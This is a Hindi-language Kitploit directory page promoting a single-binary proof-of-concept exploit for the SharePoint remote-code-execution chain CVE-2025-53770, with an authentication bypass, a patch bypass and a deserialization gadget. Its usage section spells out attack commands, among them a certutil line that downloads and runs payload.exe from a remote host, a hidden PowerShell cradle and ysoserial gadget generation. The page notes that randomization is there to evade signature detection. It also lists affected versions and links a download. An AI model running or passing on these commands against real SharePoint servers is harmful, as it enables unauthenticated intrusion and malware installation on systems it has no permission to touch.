Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OurSharePoint-CVE-2025-53770 — क्या आप सच में सोचते हैं कि SharePoint सुरक्षित है? | Kitploit
उपकरण/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubrabbitbong/oursharepoint-cve-2025-53770

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

OurSharePoint-CVE-2025-53770

क्या आप सच में सोचते हैं कि SharePoint सुरक्षित है?

रिपॉजिटरी देखें
2116 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

OurSharePoint — CVE-2025-53770 PoC

स्व-निहित, एकल-बाइनरी SharePoint RCE टूल। एक TypeConfuseDelegate गैजेट चेन को रॉ MS-NRBF बाइट्स के रूप में उत्पन्न करता है (कोई ysoserial.exe नहीं), इसे DataSet डिसीरियलाइज़ेशन पेलोड में लपेटता है, और प्रमाणीकरण बायपास का उपयोग करके HTTP पर डिलीवर करता है—सब एक ही शॉट में।


शोषण शृंखला

चरणCVEविवरण
1CVE-2025-49706प्रमाणीकरण बायपास — Referer: /_layouts/SignOut.aspx SharePoint प्रमाणीकरण को छोड़ देता है
2CVE-2025-53771पैच बायपास — ToolPane.aspx के बाद अनुगामी पथ खंड जुलाई 2025 फिक्स से बचता है
3CVE-2025-49704डिसीरियलाइज़ेशन — ExcelDataSet.CompressedDataTable एक क्राफ्टेड DataSet पर BinaryFormatter को ट्रिगर करता है
4—DataSet स्कीमा ExpandedWrapper + ObjectDataProvider के माध्यम से आंतरिक पेलोड पर LosFormatter.Deserialize() को बाध्य करता है
5—TypeConfuseDelegate — SortedSet<string> तुलनित्र Process.Start(string, string) है, cmd /c <command> निष्पादित करता है

संपूर्ण बाइनरी स्ट्रीम (बाहरी DataSet रैपर और आंतरिक TypeConfuseDelegate गैजेट दोनों) को रॉ MS-NRBF रिकॉर्ड के रूप में बनाया गया है—कोई .NET रनटाइम सीरियलाइज़ेशन उपयोग नहीं किया गया है। यह Metasploit मॉड्यूल द्वारा उत्पादित प्रारूप से बाइट-दर-बाइट मेल खाता है।


निर्माण

.NET Framework 4.8 SDK (Visual Studio 2022 या स्टैंडअलोन Build Tools) आवश्यक है:

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

आउटपुट: OurSharePoint\bin\Release\OurSharePoint.exe (एकल फ़ाइल, कोई निर्भरता नहीं)


उपयोग

एक-शॉट: स्टेज और निष्पादित करें

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

सरल कमांड निष्पादन

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

PowerShell क्रैडल

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

केवल रिकॉन (कोई पेलोड नहीं)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

पेलोड फ़ाइलें ऑफ़लाइन बनाएं

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

प्रॉक्सी (Burp) के साथ

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

लीगेसी: बाहरी ysoserial.exe पेलोड

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

विकल्प

फ़्लैगविवरणडिफ़ॉल्ट
--cmd=COMMANDनिष्पादित करने के लिए कमांड (cmd /c COMMAND के रूप में चलता है)—
--in=FILEपूर्व-निर्मित बेस64 LosFormatter पेलोड फ़ाइल—
--target=URLHTTP डिलीवरी के लिए SharePoint बेस URL—
--checkकेवल संस्करण फ़िंगरप्रिंट, कोई पेलोड नहीं—
--out=PREFIXआउटपुट फ़ाइल उपसर्गpayload
--sp-version=VERLayouts पथ संस्करण (15 या 16)15
--proxy=URLHTTP प्रॉक्सी—
--ua=STRINGकस्टम User-AgentFirefox 120
--referer=URLप्रमाणीकरण-बायपास Referer को ओवरराइड करेंस्वचालित
--timeout=SECHTTP टाइमआउट15
--a/b/c=NAMEDataSet/तत्व/स्तंभ नामयादृच्छिक

आउटपुट फ़ाइलें

जब --out उपयोग किया जाता है, तो टूल लिखता है:

फ़ाइलसामग्री
<prefix>.binरॉ BinaryFormatter DataSet स्ट्रीम
<prefix>.b64GZip + Base64 एन्कोडेड (जो CompressedDataTable में जाता है)

प्रभावित संस्करण

संस्करणकमजोर श्रेणी
SharePoint Server सब्सक्रिप्शन एडिशन16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

कार्यान्वयन नोट्स

  • कोई रनटाइम सीरियलाइज़ेशन नहीं — DataSet रैपर और TypeConfuseDelegate गैजेट दोनों को BinaryWriter का उपयोग करके रॉ MS-NRBF बाइनरी रिकॉर्ड के रूप में लिखा गया है। यह .NET रनटाइम सीरियलाइज़ेशन आउटपुट और लक्ष्य डिसीरियलाइज़र की अपेक्षा के बीच अंतर से बचता है।
  • LosFormatter फ्रेमिंग — आंतरिक गैजेट को LosFormatter.Serialize() का उपयोग करने के बजाय ObjectStateFormatter हेडर बाइट्स (0xFF 0x01 0x32 + 7-बिट लंबाई) के साथ लपेटा गया है।
  • एकल बाइनरी — कोई बाहरी टूल, DLL या Python स्क्रिप्ट आवश्यक नहीं। .exe पूरी तरह से स्व-निहित है।
  • यादृच्छिकीकरण — XML टैग उपसर्ग और DataSet तत्व नाम प्रति निष्पादन यादृच्छिक किए जाते हैं ताकि हस्ताक्षर का पता लगाने से बचा जा सके।

संदर्भ

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF स्पेसिफिकेशन
  • pwntester/ysoserial.net — TypeConfuseDelegate
टूल डाउनलोड करें